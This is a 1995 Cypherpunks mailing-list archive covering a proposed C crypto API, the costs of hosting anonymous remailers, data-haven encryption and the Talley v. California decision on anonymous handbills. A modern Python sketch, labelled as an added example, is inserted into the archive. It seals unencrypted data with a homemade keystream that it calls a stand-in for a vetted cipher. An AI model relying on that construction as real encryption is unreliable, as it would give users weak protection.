- Ciphers (this is the big one). Right now, as I've mentioned, things are very haphazard. What I want is a way to change one parameter from, for example, CRTYPE_IDEA to CRTYPE_DES and thus change the encryption scheme.

- Key management. I know of two major ways of doing things right now, X.509/PEM certificates as pushed by RSADSI, and PGP web-of-trust. As far as I can tell, PEM-style certificates are just a degenerate case of PGP web-of-trust.

- Random sources. People should be offered a pretty good source of random numbers, but should also be allowed to drop in their own sources. This is going to be relatively tough on platforms I don't know much about, IE Mac and PC, but I'm hoping for some help on this. I can also salvage some code from RIPEM for those.

- Autoconfiguration to incoming messages. People should be able to open a file and have it work, even with schema added to the library after the original adaption to GUCAPI.

There's some other stuff that I'm probably forgetting here, but that's the gist of it.

The cipher code is going to be pretty simple: I'm getting a lot of code from various places on the net; the code exists, it just isn't put into a form that is easy to use.

The most difficult is going to be a generalized scheme for key management: first off, I'm probably going to simply use PGP's web-of-trust as my model, assuming the X.509/PEM style certificates can be treated as degenerate cases of web of trust.

I also intend to offer a GSSAPI interface to all of this, as seems appropriate when I get to it.

This is so far all in C: I'm not a C++ convert yet and C is still the most portable of the languages about.
Later, perhaps class libraries can be designed around the same code.

Thoughts? Am I wasting my time, or is this a worthwhile pursuit? And should I find a better name than GUCAPI?

-- Todd

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLx7wfCoZzwIn1bdtAQGIWAF9GgY29Qop9p1TEryO3oe/cFUyyBAJQtp7
yPGjEDyCvk/vtLHTAxhQoMTE98MMkPP1
=EoBl
-----END PGP SIGNATURE-----

From tedwards at src.umd.edu Thu Jan 19 15:27:14 1995
From: tedwards at src.umd.edu (Thomas Grant Edwards)
Date: Thu, 19 Jan 95 15:27:14 PST
Subject: Electronic cash illegal?
In-Reply-To: <9501190336.AA12782@toxicwaste.media.mit.edu>
Message-ID:

On Wed, 18 Jan 1995, Derek Atkins wrote:

> The US dollar is backed by trust alone, today.

Actually, the "backing" of a fiat currency is the need to have some around to pay your taxes, else you go to jail. You are taxed on many types of income, even if they are not directly exchanged in the fiat currency. Somehow you have to get some.

This also means that higher taxes can make the currency more desirable, lower taxes less, higher government spending less, lower government spending more, etc.

-Thomas

From root at einstein.ssz.com Thu Jan 19 15:42:38 1995
From: root at einstein.ssz.com (root)
Date: Thu, 19 Jan 95 15:42:38 PST
Subject: The Remailer Crisis
In-Reply-To:
Message-ID: <199501192344.RAA03508@einstein.ssz.com>

>
> I am currently using ISDN from my home in San Jose. You're right in
> that the startup costs are the barrier--even a cheap single B channel
> (56K) terminal adapter for use with a serial port will run $300-$400
> dollars. The telco charges are minimal in my area; $25 monthly for
> the line itself (115 Kbps async bandwidth). Connect charges are free
> for non peak usage, and $0.60/hour for peak usage time (0800 to 1700)
> Mon-Fri.
>

I am also using ISDN to get my network on through Southwestern Bell. The charges I had to deal with were:

$135 deposit (refunded in 2 years)

$73 per month line rate (2B+D)

$350 per month for ISDN connection to another system on Internet and in Austin there is only one system that can do this for .com sites. This is a common problem all over the country I understand.

$1150 for Combinet 160 w/ NT-1 for ISDN-Ethernet bridge.

$750 for account setup and for the folks at the other end to configure.

This is a little expensive for home use but well within the means of even small businesses.

> This is the Pacific Bell "Residential" ISDN plan. For business lines,
> it goes up to $50 monthly with $0.60/hour 24 hours a day.
>

I am lucky in that I am flat rate.

> In addition to this would apply any standard long distance charges that
> would apply to a particular call.
>

We get charged only for the D channel traffic which is usually used for call progress control. In general we don't use the D channel at all.

> This is an excellent setup for fast, cheap, INTERMITTENT connection to
> the Internet. My particular ISP is in Santa Cruz, with POPS in SC, SJ,
> and soon Monterey. An unlimited connect time PPP account runs $75 monthly.
> This actually gets me a three bit subnet so that I can put five IP boxes
> and an ISDN router on my ethernet at home.
>

It is a clean, fast (300kbs w/ compression), and economical for a full time feed as well.

From strick at versant.com Thu Jan 19 15:46:55 1995
From: strick at versant.com (strick at versant.com)
Date: Thu, 19 Jan 95 15:46:55 PST
Subject: *.techwood.org
In-Reply-To:
Message-ID: <9501192349.AA15217@versant.com>

-----BEGIN PGP SIGNED MESSAGE-----

THUS SPAKE jrochkin at cs.oberlin.edu (Jonathan Rochkind):
#
# Maybe it's time for Eric to figure out what he's going to do
# with remailer.net.
If anyone wants a third-level domain name *.techwood.org for their linux box, send me mail *from root* on your box, telling me what third-level name you want. (Techwood.org is the Techwood Broadcasting Foundation, incorporated under orbital law.)

Put "techwood" in your Subject: line, and mail it to me at from root at your site. I will dig you and ping you to get your dotted quad for an A record, and I'll make an MX record that goes only to you.

strick

p.s. then in your /etc/sendmail.cf put a line like this

    Cz mumble.techwood.org

(if you're running a recent UCB sendmail (like version 8.6 or later)) so that your site will accept mail destined to username at mumble.techwood.org. (and kill -1 your sendmail daemon)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBLx75twq3IMgMJUNlAQE4JAH/Tolj835s+mLt6A2+AmH9rHIr7dUuYbZ5
VPIE4pnWn/CfQEx8DTwlKJN8Z5QlPfw/rWyahWpU/Thg7BbLypFfHg==
=N/Gq
-----END PGP SIGNATURE-----

From Jaeson.M.Engle at josaiah.sewanee.edu Thu Jan 19 16:24:37 1995
From: Jaeson.M.Engle at josaiah.sewanee.edu (Rhys Kyraden)
Date: Thu, 19 Jan 95 16:24:37 PST
Subject: The Remailer Crisis
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Just out of curiosity on this subject, is there any remailer software for Macs? I think I have enough leverage and power on my campus to be able to run a remailer here during the school months *which is when I have net access*. If there isn't, how hard would it be to do? Could it be done with something like MailShare indirectly?

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLx8CQkiLvmPjc4XdAQFS4wP/aufMYK054Ed5fZn84xLDSsXqF3+hv4jw
uQKSUl6Kv46Ek+IypX0DwI31SqasS96vosC0W/p9uPO/MFoAyp9/EdcAkH65yWSO
Gv3iQmm/j0Lx81dxTB4mjYZUdY3wJQFd4O/vY+mT9I6OmtE6lNDzYRyn9VCl7zfw
t5G67Z6+Pas=
=TosY
-----END PGP SIGNATURE-----

aka:
(-: Jaeson M. Engle || jme at josaiah.sewanee.edu :-)
(-: www server: http://josaiah.sewanee.edu/ :-)
(-: It's January 29th! IT'S TIME!!!
Ask me for details!:-) (-: Finger 'jme at josaiah.sewanee.edu' for my Public :-) PGP block. From eric at remailer.net Thu Jan 19 16:27:26 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 19 Jan 95 16:27:26 PST Subject: *.techwood.org In-Reply-To: <9501192349.AA15217@versant.com> Message-ID: <199501200027.QAA10644@largo.remailer.net> # Maybe it's time for Eric to figure out what he's going to do # with remailer.net. Standardization, is what. It's not ready, so no names yet. From: strick at versant.com If anyone wants a third-level domain name *.techwood.org for their linux box, send me mail *from root* on your box, telling me what third-level name you want. This is the right avenue right now for a non-.edu remailer address. Immediate, cheap, etc. And incidentally, it's a great idea to use a different domain name for these services. Eric From eric at remailer.net Thu Jan 19 16:33:41 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 19 Jan 95 16:33:41 PST Subject: The Remailer Crisis In-Reply-To: <199501192123.AA29095@panix.com> Message-ID: <199501200033.QAA10651@largo.remailer.net> From: frissell at panix.com (Duncan Frissell) I offer to pay for and operate a remailer account on any system that will have me. best.com, based in Mt. View, CA. Mail to postmaster at best.com, or try the other standard extensions. I'm sure there are others. Do we have the software yet to run a remailer out of an account? When I wrote the first cypherpunk remailer, this was a design criterion. In other words, yes. Eric From tcmay at netcom.com Thu Jan 19 16:56:16 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 19 Jan 95 16:56:16 PST Subject: The Remailer Crisis In-Reply-To: Message-ID: <199501200054.QAA11075@netcom21.netcom.com> Johnathan Corgan wrote: > I am currently using ISDN from my home in San Jose. 
You're right in > that the startup costs are the barrier--even a cheap single B channel > (56K) terminal adapter for use with a serial port will run $300-$400 > dollars. The telco charges are minimal in my area; $25 monthly for > the line itself (115 Kbps async bandwidth). Connect charges are free > for non peak usage, and $0.60/hour for peak usage time (0800 to 1700) > Mon-Fri. Well, let's do the math. Since the remailer has to be connected at all times, of course, this implies $162 a month in connect charges, over and above the other charges. Or $187 a month including the line charge. Or $2244 a year. This makes a "cheap Linux box" almost a moot point. This is a lot more than I'm willing to pay to run a remailer. (I can imagine workarounds that involve connecting at regular intervals to pick up mail....assuming it "accumulates" somewhere (?), but the goal of a remailer "on the Net" is what I'm after.) > A remailer in this scenario would need to have their MX record point to > their ISP, and process mail via POP (incoming) and SMTP (outgoing). > It would be straightforward to implement a timed or demand dial scenario > (say, every fifteen minutes) to accomplish this. While not the ideal > (continuous internet connection with pure SMTP based mail transport), it > would suffice for a moderately loaded remailer, I'd imagine. > > Of course, this involves the mail subsystem of your ISP, partially > defeating the purpose of having ubiquitous anonymous remailer "instances" > whose operation is outside the control of an ISP. Still, it would be > a good start. I agree that it's something to look at. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. 
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From unicorn at access.digex.net Thu Jan 19 16:56:32 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Thu, 19 Jan 95 16:56:32 PST
Subject: Does encrypted equal safe?
In-Reply-To: <9501172355.AA12246@eri.erinet.com>
Message-ID:

On Tue, 17 Jan 1995, Paul J. Ste. Marie wrote:

> Date: Tue, 17 Jan 95 18:55:30 EST
> From: Paul J. Ste. Marie
> To: Eric Hughes , cypherpunks at toad.com
> Subject: Re: Does encrypted equal safe?
>
> At 01:28 PM 1/17/95 -0800, Eric Hughes wrote:
> > ... Meaning is subjective. If I see encrypted text, am I to be held
> >responsible for having seen through an encryption for which I hold not
> >the key? Merely because someone knows a transformation into a
> >disapproved form does not mean that I do. ...
>
> Which is exactly why the encrypt on receipt or decrypt on delivery ideas
> won't work. You have to be provably ignorant of the data.
>

I must disagree.

This hinges on the REASON for encrypting the data.

In my model, data that arrives at the haven unencrypted is unwelcome, and is encrypted to be used as traffic "noise," not for security.

Any unencrypted data is undesirable, it opening the door to kiddieporn by mail tactics. (Government sends user A kiddie porn, then arrests user A for kiddie porn possession.)

An automatic encryption of all unencrypted data, the key to which is randomly generated and destroyed, allows the traffic to foil analysis, while preventing the operator from being subjected to plant frames.

Decrypt on arrival is hardly defensible in this context of course.

>
> --Paul J. Ste. Marie
> pstemari at well.sf.ca.us, pstemari at erinet.com
>
>

-uni- (Dark)

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!
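The intake rule described in the message above (anything that arrives unencrypted is sealed under a random key that is then discarded) can be sketched as follows. This is an added example, not code from the post or from any remailer package: the function names and the padding bucket are hypothetical, and the SHAKE-256 keystream is a standard-library stand-in for a vetted cipher. It also checks the first OpenPGP packet tag, because an armor header by itself does not show that the payload is encrypted.

```python
import base64
import hashlib
import secrets

ARMOR_BEGIN = "-----BEGIN PGP MESSAGE-----"
ARMOR_END = "-----END PGP MESSAGE-----"
# OpenPGP packet tags whose presence as the first packet means the payload
# is encrypted (RFC 4880): 1 and 3 are encrypted session keys, 9 and 18 are
# symmetrically encrypted data. Tags 8 (compressed) or 11 (literal) mean the
# armor wraps readable data, so the armor header alone proves nothing.
ENCRYPTED_TAGS = {1, 3, 9, 18}
PAD_BUCKET = 1024  # assumption: stored blobs are padded to a multiple of this


def first_packet_tag(text):
    """Return the tag of the first packet in a PGP armor block, else None."""
    if ARMOR_BEGIN not in text or ARMOR_END not in text:
        return None
    block = text.split(ARMOR_BEGIN, 1)[1].split(ARMOR_END, 1)[0]
    lines = [ln.strip() for ln in block.strip().splitlines()]
    if "" in lines:  # armor headers (Version:, Comment:) end at a blank line
        lines = lines[lines.index("") + 1:]
    data = "".join(ln for ln in lines if ln and not ln.startswith("="))
    try:
        raw = base64.b64decode(data, validate=True)
    except ValueError:
        return None
    if not raw or not raw[0] & 0x80:  # bit 7 is set on every packet header
        return None
    # New-format headers keep the tag in bits 5-0, old-format in bits 5-2.
    return raw[0] & 0x3F if raw[0] & 0x40 else (raw[0] >> 2) & 0x0F


def seal_and_forget(plaintext):
    """Encrypt under a one-time random key and return only the ciphertext."""
    key = secrets.token_bytes(32)
    nonce = secrets.token_bytes(16)
    framed = len(plaintext).to_bytes(4, "big") + plaintext
    framed += bytes(-len(framed) % PAD_BUCKET)  # hide the exact length
    # Stand-in keystream; a deployment would use a vetted AEAD instead.
    stream = hashlib.shake_256(key + nonce).digest(len(framed))
    blob = nonce + bytes(a ^ b for a, b in zip(framed, stream))
    # The key is never written or returned. Python cannot guarantee that the
    # bytes are wiped from memory, so this only models the destruction step.
    del key, stream
    return blob


def intake(body):
    """Apply the rule: keep encrypted traffic as is, seal everything else."""
    tag = first_packet_tag(body)
    if tag in ENCRYPTED_TAGS:
        return {"action": "stored-as-received", "tag": tag, "blob": body.encode()}
    return {"action": "sealed-key-destroyed", "tag": tag,
            "blob": seal_and_forget(body.encode())}


def armor_sample(raw):
    """Build a constructed armor block (no CRC line; the parser ignores it)."""
    b64 = base64.b64encode(raw).decode()
    return f"{ARMOR_BEGIN}\nVersion: 2.6.2\n\n{b64}\n{ARMOR_END}\n"


# Constructed inputs: 0x85 is an old-format header for tag 1, 0xA3 for tag 8.
SAMPLE_ENCRYPTED = armor_sample(bytes([0x85, 0x01, 0x0C]) + bytes(range(32)))
SAMPLE_ARMORED_CLEAR = armor_sample(bytes([0xA3, 0x01]) + b"constructed data")
SAMPLE_PLAIN = "Constructed plaintext that arrived unencrypted.\n"

if __name__ == "__main__":
    for name in ("SAMPLE_ENCRYPTED", "SAMPLE_ARMORED_CLEAR", "SAMPLE_PLAIN"):
        result = intake(globals()[name])
        print(name, result["action"], result["tag"], len(result["blob"]))
```

The plaintext is still in the process's memory during intake, which is the point the quoted objection about being provably ignorant of the data turns on; the sketch only shows that nothing recoverable is stored afterwards.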
From sameer at c2.org Thu Jan 19 17:08:28 1995
From: sameer at c2.org (sameer)
Date: Thu, 19 Jan 95 17:08:28 PST
Subject: The Remailer Crisis
In-Reply-To: <199501200033.QAA10651@largo.remailer.net>
Message-ID: <199501200105.RAA05837@infinity.c2.org>

>
> From: frissell at panix.com (Duncan Frissell)
>
> I offer to pay for and operate a remailer account on any system that will
> have me.
>
> best.com, based in Mt. View, CA. Mail to postmaster at best.com, or try
> the other standard extensions.
>
> I'm sure there are others.
>

To my knowledge there exist 3 packages which allow you to run a remailer out of an account. Matt Ghio's remailer, mixmaster (Lance Cottrell?), and the simple package available on ftp.csua.berkeley.edu, which derives from Eric and Hal's original code.

c2.org, of course, welcomes remailers.

--
sameer                                  Voice: 510-841-2014
Network Administrator                   Pager: 510-321-1014
Community ConneXion: The NEXUS-Berkeley Dialin: 510-549-1383
http://www.c2.org (or login as "guest") sameer at c2.org

From grendel at netaxs.com Thu Jan 19 17:45:27 1995
From: grendel at netaxs.com (Michael Handler)
Date: Thu, 19 Jan 95 17:45:27 PST
Subject: What is this? Anonymous message failed
In-Reply-To:
Message-ID:

On Wed, 18 Jan 1995, Lucky Green wrote:

> Just got back a message from Julf's remailer that my Anonymous message failed
> (wrong password). Needless to say, I didn't try to send one through the
> remailer. The message it was referring to is the one I sent to the list
> earlier. Is this a repeat of the an/na problems we had in the past?

Yes. The unfortunate culprit was . I sent him mail, non-blinded, and posted a message to Cypherpunks and to to get it fixed. I haven't been getting them anymore, so I suspect somebody fixed the problem.

A while ago, someone posted a regexp for majordomo that would automatically convert a address to a address. Does anyone have that lying around anywhere?
Michael From nzook at bga.com Thu Jan 19 18:06:00 1995 From: nzook at bga.com (Nathan Zook) Date: Thu, 19 Jan 95 18:06:00 PST Subject: Which remailer does Julf operate? Message-ID: sez it all Nathan From jcorgan at scruznet.com Thu Jan 19 19:31:04 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Thu, 19 Jan 95 19:31:04 PST Subject: The Remailer Crisis Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >Well, let's do the math. Since the remailer has to be connected at all >times, of course, this implies $162 a month in connect charges, over >and above the other charges. Or $187 a month including the line >charge. Or $2244 a year. > >This makes a "cheap Linux box" almost a moot point. This is a lot more >than I'm willing to pay to run a remailer. > >(I can imagine workarounds that involve connecting at regular >intervals to pick up mail....assuming it "accumulates" somewhere (?), >but the goal of a remailer "on the Net" is what I'm after.) Well, yes, this is true. My point was that reliable, fast, easy to use bandwidth on the order of 128 Kbps is available now in some areas for relatively cheap rates. _With the condition_ that continuous access is not necessary to run a remailer (as I had outlined), this could prove to be a good jumping off ground for some remailer operators. Sheesh, I could start my own on my home ethernet if I were so inclined. The solution to the access fee problem is, of course, sharing that fee with other payees. Your example of putting boxes directly on TLG's network is a good example of this. >I agree that it's something to look at. We don't disagree here; we are solving two different problems it appears. == Johnathan Corgan "Violence is the last refuge of the incompetent." 
jcorgan at scruznet.com -Isaac Asimov

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx8uG01Diok8GKihAQHClwP/fVWl/GWM9lWArj4qP4orDV9ZGJWqaCEj
LJYVSekzetdxIn2iBfTcCLCSwYKqTsJgCKha8tqxM9H5Zq2hVUYat9TlGKBZwpfr
b/Vy+N3K1o/+E3NnWxcsJPLaeJfkom1sIJZiZkXKrqUM2v7v2l8MERub7uYG/EIl
5LhaDwdg9ig=
=Acce
-----END PGP SIGNATURE-----

From jamesd at netcom.com Thu Jan 19 19:52:47 1995
From: jamesd at netcom.com (James A. Donald)
Date: Thu, 19 Jan 95 19:52:47 PST
Subject: The Remailer Crisis
In-Reply-To: <199501200054.QAA11075@netcom21.netcom.com>
Message-ID:

On Thu, 19 Jan 1995, Timothy C. May wrote:

> Well, let's do the math. Since the remailer has to be connected at all
> times, of course, this implies $162 a month in connect charges, over
> and above the other charges. Or $187 a month including the line
> charge. Or $2244 a year.
>
> This makes a "cheap Linux box" almost a moot point. This is a lot more
> than I'm willing to pay to run a remailer.

Best.com offers a dedicated 28.8kB line connection to the internet with $450 setup charge and $60 a month connect charge.

This is a permanent connection, not a dial up connection.

This works out to $720 per year, plus setup charge.

This is as cheap as it gets for a box on the internet.

Now this is OK if one wishes to run linux, and have a remailer as one hobby in addition to the main use of the box, but it is still a bit much to pay for a dedicated remailer.

Now I just do not like linux. Sure it is a great operating system but it will not run codewright (Vi causes mental degeneration. Even though I detest, loathe, and hate vi, vi takes up so much brainspace that I find myself issuing vi commands in editors that I use much more, and vastly prefer to vi. Vi is evil.)

Therefore there is no way in the world I am going to waste a full internet connection and a PC on linux.
--------------------------------------------------------------------- | We have the right to defend ourselves | http://www.catalog.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the omnipotent state. | jamesd at netcom.com From stjude at well.sf.ca.us Thu Jan 19 20:27:16 1995 From: stjude at well.sf.ca.us (Judith Milhon) Date: Thu, 19 Jan 95 20:27:16 PST Subject: stjude? Message-ID: <199501200427.UAA16720@well.sf.ca.us> i'd be happy to get forwarded the skirmishes around my existence. Anybody save them? i'm not on the list because i'm writing 2 books, but i have root in the solar system, true, and i did come up with the name cypherpunk one morning as i was washing my cat... hit me like a meteorite... cypherpunk... yes... mumble >jude< From abacard at well.sf.ca.us Thu Jan 19 20:37:51 1995 From: abacard at well.sf.ca.us (Andre Bacard) Date: Thu, 19 Jan 95 20:37:51 PST Subject: Supreme Court & Anonymity Message-ID: <199501200437.UAA20363@well.sf.ca.us> -----BEGIN PGP SIGNED MESSAGE----- Attached is a Supreme Court decision that may bear directly upon anonymous remailers and upon people who want to curtail anonymous remailers. This info came from Dave Banisar at EPIC via Stanton McCandlish at EFF . Thanks to Attorney Banisar for supplying this information. See you in the future, Andre - ------------------------------------------------------------ Andre Bacard Bacard wrote "The Computer Privacy Box 3009 Handbook: A Practical Guide to E-Mail Stanford, CA 94309 Encryption, Data Protection, and PGP abacard at well.com Privacy Software" [for novices/experts]. Introduction by Mitchell Kapor, Chairman, Electronic Frontier Foundation and Founder of Lotus 1-2-3. Book Available February 1995. Write for Details - ------------------------------------------------------------ TALLEY v. CALIFORNIA SUPREME COURT OF THE UNITED STATES 362 U.S. 
60

January 13-14, 1960, Argued
March 7, 1960, Decided

Certiorari to the Appellate Department of the Superior Court of California, Los Angeles County. 172 Cal. App. 2d Supp. 797, 332 P. 2d 447, reversed.

A. L. Wirin and Hugh R. Manes argued the cause for petitioner. With them on the brief was Fred Okrand. Philip E. Grey argued the cause for respondent. With him on the brief was Roger Arnebergh. Shad Polier, Will Maslow, Leo Pfeffer and Joseph B. Robison filed a brief for the American Jewish Congress, as amicus curiae, urging reversal.

Warren, Black, Frankfurter, Douglas, Clark, Harlan, Brennan, Whittaker, Stewart

MR. JUSTICE BLACK delivered the opinion of the Court.

The question presented here is whether the provisions of a Los Angeles City ordinance restricting the distribution of handbills "abridge the freedom of speech and of the press secured against state invasion by the Fourteenth Amendment of the Constitution." n1 The ordinance, @ 28.06 of the Municipal Code of the City of Los Angeles, provides:

"No person shall distribute any hand-bill in any place under any circumstances, which does not have printed on the cover, or the face thereof, the name and address of the following:

"(a) The person who printed, wrote, compiled or manufactured the same.

"(b) The person who caused the same to be distributed; provided, however, that in the case of a fictitious person or club, in addition to such fictitious name, the true names and addresses of the owners, managers or agents of the person sponsoring said hand-bill shall also appear thereon."

The petitioner was arrested and tried in a Los Angeles Municipal Court for violating this ordinance. It was stipulated that the petitioner had distributed handbills in Los Angeles, and two of them were presented in evidence. Each had printed on it the following:

National Consumers Mobilization, Box 6533, Los Angeles 55, Calif. PLeasant 9-1576.
The handbills urged readers to help the organization carry on a boycott against certain merchants and businessmen, whose names were given, on the ground that, as one set of handbills said, they carried products of "manufacturers who will not offer equal employment opportunities to Negroes, Mexicans, and Orientals." There also appeared a blank, which, if signed, would request enrollment of the signer as a "member of National Consumers Mobilization," and which was preceded by a statement that "I believe that every man should have an equal opportunity for employment no matter what his race, religion, or place of birth."

The Municipal Court held that the information printed on the handbills did not meet the requirements of the ordinance, found the petitioner guilty as charged, and fined him $10. The Appellate Department of the Superior Court of the County of Los Angeles affirmed the conviction, rejecting petitioner's contention, timely made in both state courts, that the ordinance invaded his freedom of speech and press in violation of the Fourteenth and First Amendments to the Federal Constitution. n2 172 Cal. App. 2d Supp. 797, 332 P. 2d 447. Since this was the highest state court available to petitioner, we granted certiorari to consider this constitutional contention. 360 U.S. 928.

In Lovell v. Griffin, 303 U.S. 444, we held void on its face an ordinance that comprehensively forbade any distribution of literature at any time or place in Griffin, Georgia, without a license. Pamphlets and leaflets, it was pointed out, "have been historic weapons in the defense of liberty" n3 and enforcement of the Griffin ordinance "would restore the system of license and censorship in its baldest form." Id., at 452. A year later we had before us four ordinances each forbidding distribution of leaflets -- one in Irvington, New Jersey, one in Los Angeles, California, one in Milwaukee, Wisconsin, and one in Worcester, Massachusetts. Schneider v. State, 308 U.S. 147.
Efforts were made to distinguish these four ordinances from the one held void in the Griffin case. The chief grounds urged for distinction were that the four ordinances had been passed to prevent either frauds, disorder, or littering, according to the records in these cases, and another ground urged was that two of the ordinances applied only to certain city areas. This Court refused to uphold the four ordinances on those grounds pointing out that there were other ways to accomplish these legitimate aims without abridging freedom of speech and press. Frauds, street littering and disorderly conduct could be denounced and punished as offenses, the Court said. Several years later we followed the Griffin and Schneider cases in striking down a Dallas, Texas, ordinance which was applied to prohibit the dissemination of information by the distribution of handbills. We said that although a city could punish any person for conduct on the streets if he violates a valid law, "one who is rightfully on a street . . . carries with him there as elsewhere the constitutional right to express his views in an orderly fashion . . . by handbills and literature as well as by the spoken word." Jamison v. Texas, 318 U.S. 413, 416. The broad ordinance now before us, barring distribution of "any hand-bill in any place under any circumstances," n4 falls precisely under the ban of our prior cases unless this ordinance is saved by the qualification that handbills can be distributed if they have printed on them the names and addresses of the persons who prepared, distributed or sponsored them. For, as in Griffin, the ordinance here is not limited to handbills whose content is "obscene or offensive to public morals or that advocates unlawful conduct." Counsel has urged that this ordinance is aimed at providing a way to identify those responsible for fraud, false advertising and libel. 
Yet the ordinance is in no manner so limited, nor have we been referred to any legislative history indicating such a purpose. Therefore we do not pass on the validity of an ordinance limited to prevent these or any other supposed evils. This ordinance simply bars all handbills under all circumstances anywhere that do not have the names and addresses printed on them in the place the ordinance requires. There can be no doubt that such an identification requirement would tend to restrict freedom to distribute information and thereby freedom of expression. "Liberty of circulating is as essential to that freedom as liberty of publishing; indeed, without the circulation, the publication would be of little value." Lovell v. Griffin, 303 U.S., at 452. Anonymous pamphlets, leaflets, brochures and even books have played an important role in the progress of mankind. Persecuted groups and sects from time to time throughout history have been able to criticize oppressive practices and laws either anonymously or not at all. The obnoxious press licensing law of England, which was also enforced on the Colonies was due in part to the knowledge that exposure of the names of printers, writers and distributors would lessen the circulation of literature critical of the government. The old seditious libel cases in England show the lengths to which government had to go to find out who was responsible for books that were obnoxious to the rulers. John Lilburne was whipped, pilloried and fined for refusing to answer questions designed to get evidence to convict him or someone else for the secret distribution of books in England. Two Puritan Ministers, John Penry and John Udal, were sentenced to death on charges that they were responsible for writing, printing or publishing books. n6 Before the Revolutionary War colonial patriots frequently had to conceal their authorship or distribution of literature that easily could have brought down on them prosecutions by English-controlled courts. 
Along about that time the Letters of Junius were written and the identity of their author is unknown to this day. n7 Even the Federalist Papers, written in favor of the adoption of our Constitution, were published under fictitious names. It is plain that anonymity has sometimes been assumed for the most constructive purposes.

We have recently had occasion to hold in two cases that there are times and circumstances when States may not compel members of groups engaged in the dissemination of ideas to be publicly identified. Bates v. Little Rock, 361 U.S. 516; N. A. A. C. P. v. Alabama, 357 U.S. 449, 462. The reason for those holdings was that identification and fear of reprisal might deter perfectly peaceful discussions of public matters of importance. This broad Los Angeles ordinance is subject to the same infirmity. We hold that it, like the Griffin, Georgia, ordinance, is void on its face.

The judgment of the Appellate Department of the Superior Court of the State of California is reversed and the cause is remanded to it for further proceedings not inconsistent with this opinion.

It is so ordered.

Footnotes

n1 Schneider v. State, 308 U.S. 147, 154. Cf. Lovell v. Griffin, 303 U.S. 444, 450.

n2 Petitioner also argues here that the ordinance both on its face and as construed and applied "arbitrarily denies petitioner equal protection of the laws in violation of the Due Process and Equal Protection" Clauses of the Fourteenth Amendment. This argument is based on the fact that the ordinance applies to handbills only, and does not include within its proscription books, magazines and newspapers. Our disposition of the case makes it unnecessary to consider this contention.

n3 The Court's entire sentence was: "These [pamphlets and leaflets] indeed have been historic weapons in the defense of liberty, as the pamphlets of Thomas Paine and others in our own history abundantly attest." It has been noted that some of Thomas Paine's pamphlets were signed with pseudonyms.
See Bleyer, Main Currents in the History of American Journalism (1927), 90-93. Illustrations of other anonymous and pseudonymous pamphlets and other writings used to discuss important public questions can be found in this same volume. n4 Section 28.00 of the Los Angeles Municipal Code defines "handbill" as follows: "'HAND-BILL' shall mean any hand-bill, dodger, commercial advertising circular, folder, booklet, letter, card, pamphlet, sheet, poster, sticker, banner, notice or other written, printed or painted matter calculated to attract attention of the public." n5 Lovell v. Griffin, 303 U.S., at 451. n6 Penry was executed and Udal died as a result of his confinement. 1 Hallam, The Constitutional History of England (1855), 205-206, 232. n7 In one of the letters written May 28, 1770, the author asked the following question about the tea tax imposed on this country, a question which he could hardly have asked but for his anonymity: "What is it then, but an odious, unprofitable exertion of a speculative right, and fixing a badge of slavery upon the Americans, without service to their masters?" 2 Letters of Junius (1821) 39. MR. JUSTICE HARLAN, concurring. In judging the validity of municipal action affecting rights of speech or association protected against invasion by the Fourteenth Amendment, I do not believe that we can escape, as Mr. Justice Roberts said in Schneider v. State, 308 U.S. 147, 161, "the delicate and difficult task" of weighing "the circumstances" and appraising "the substantiality of the reasons advanced in support of the regulation of the free enjoyment of" speech. More recently we have said that state action impinging on free speech and association will not be sustained unless the governmental interest asserted to support such impingement is compelling. See N. A. A. C. P. v. Alabama, 357 U.S. 449, 463, 464; Sweezy v. New Hampshire, 354 U.S. 234, 265 (concurring opinion); see also Bates v. Little Rock, 361 U.S. 516. 
Here the State says that this ordinance is aimed at the prevention of "fraud, deceit, false advertising, negligent use of words, obscenity, and libel," in that it will aid in the detection of those responsible for spreading material of that character. But the ordinance is not so limited, and I think it will not do for the State simply to say that the circulation of all anonymous handbills must be suppressed in order to identify the distributors of those that may be of an obnoxious character. In the absence of a more substantial showing as to Los Angeles' actual experience with the distribution of obnoxious handbills, * such a generality is for me too remote to furnish a constitutionally acceptable justification for the deterrent effect on free speech which this all-embracing ordinance is likely to have. On these grounds I concur in the judgment of the Court. Footnotes: * On the oral argument the City Attorney stated: "We were able to find out that prior to 1931 an effort was made by the local Chamber of Commerce, urging the City Council to do something about these handbills and advertising matters which were false and misleading -- had no names of sponsors. They were particularly interested in the fictitious name. They said, 'Who are these people that are distributing; who are advertising; doing things of that sort?' The meager record that we were able to find indicates that a request from the Council to the City Attorney as to their legal opinion on this subject [sic]. The City Attorney wrote back and formed the conclusion that distribution of handbills, pamphlets, or other matters, without the name of the fictitious firm or officers would be legal [sic]. 
Thereafter in the early part of 1932 an ordinance was drafted, and submitted to the City Council, and approved by them, which related to the original subject -- unlawful for any person, firm or association to distribute in the city of Los Angeles any advertisement or handbill -- or any other matter which does not have the names of the sponsors of such literature."

MR. JUSTICE CLARK, whom MR. JUSTICE FRANKFURTER and MR. JUSTICE WHITTAKER join, dissenting.

